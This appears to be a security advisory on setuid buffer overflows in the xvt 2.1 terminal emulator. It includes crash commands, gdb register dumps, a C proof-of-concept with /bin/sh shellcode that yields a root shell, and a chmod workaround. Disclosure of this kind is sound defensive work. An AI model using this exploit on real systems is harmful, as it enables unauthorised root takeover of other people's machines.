COMMAND

    xvt

SYSTEMS AFFECTED

    xvt 2.1

PROBLEM

    Christophe  Bailleux  found  following.   xvt  is  an  X  terminal
    emulator that is designed to be more or less compatible with xterm
    while using much less swap space.   It is mainly intended for  use
    at sites which use  large numbers of X  terminals but may also  be
    useful on single workstations that are short of memory.  The  main
    way that xvt  achieves its small  size is by  avoiding the use  of
    the X toolkit.

    After the security advisory about rxvt by Samuel Dralet Christophe
    discovered that  xvt has  some possible  buffer overrun conditions
    related to passing large arguments  to xvt's -T and -name  command
    line options.  Since xvt  is installed setuid root by  default, it
    was possible for a normal user to pass carefully-crafted arguments
    to xvt such that xvt executed a root shell.

    Debian  Security  Team  has  been  informed  as that was tested on
    Debian.

        $ ls -l /usr/bin/X11/xvt
        -rwsr-xr-x    1 root     root        50288 Mar 26  2000 /usr/bin/X11/xvt

        $ xvt -V
        xvt version 2.1


        A)      xvt -name <buffer>
        
        $ xvt -name `perl -e 'print "A"x234'`
        Segmentation fault (core dumped)
        $
        
        tshaw:~$ gdb --core core
        GNU gdb 5.0
        <snip>
        Core was generated by `xvt -name
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
        Program terminated with signal 11, Segmentation fault.
        #0  0x41414141 in ?? ()
        (gdb)
        
        
        B)      xvt -T <buffer>
        
        $ xvt -T `perl -e 'print "A"x262'`
        Segmentation fault (core dumped)
        $
        
        $ gdb --core core
        GNU gdb 5.0
        Copyright 2000 Free Software Foundation, Inc.
        <snip>
        Core was generated by `xvt -T
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
        Program terminated with signal 11, Segmentation fault.
        #0  0x804b043 in ?? ()
        (gdb) where
        #0  0x804b043 in ?? ()
        #1  0x804c075 in ?? ()
        #2  0x804b4f6 in ?? ()
        #3  0x804a19c in ?? ()
        (gdb) info reg
        eax            0x8004100        134234368
        ecx            0xffffffff       -1
        edx            0x805524f        134566479
        ebx            0x8055148        134566216
        esp            0xbfffdea0       0xbfffdea0
        ebp            0xbfffdeac       0xbfffdeac
        esi            0x8004141        134234433
        edi            0x8004141        134234433
        eip            0x804b043        0x804b043
        eflags         0x10246  66118
        cs             0x23     35
        ss             0x2b     43
        ds             0x2b     43
        es             0x2b     43
        fs             0x2b     43
        gs             0x2b     43
        fctrl          0x0      0
        fstat          0x0      0
        ftag           0x0      0
        fiseg          0x0      0
        fioff          0x0      0
        foseg          0x0      0
        fooff          0x0      0
        fop            0x0      0
        (gdb)

    Exploit:

    /*
    
       /usr/bin/X11/xvt overflow proof of concept by cb@t-online.fr.
    
       tshaw:~$ ./expl
       bash#
    
    */
    
    #include <stdio.h>
    #include <stdlib.h>
    
    int main()
    
    {
    
        char buf[234];
        int i;
    
        char code[] =
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
            "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    
    
        for(i=0; i<76; i++)
            buf[i] = 0x41;
    
        *(long *)&buf[76]=0xbffffab0; /* ret addr */
    
        memset(buf + 80, 0x90, 234);
        memcpy(buf + 233 - strlen(code), code, strlen(code));
    
        buf[234] = '\0';
    
        execl("/usr/bin/X11/xvt", "xvt", "-name", buf, 0);
    
    }

SOLUTION

    Workaround is to strip down suid bit chmod u-s /usr/bin/X11/xvt.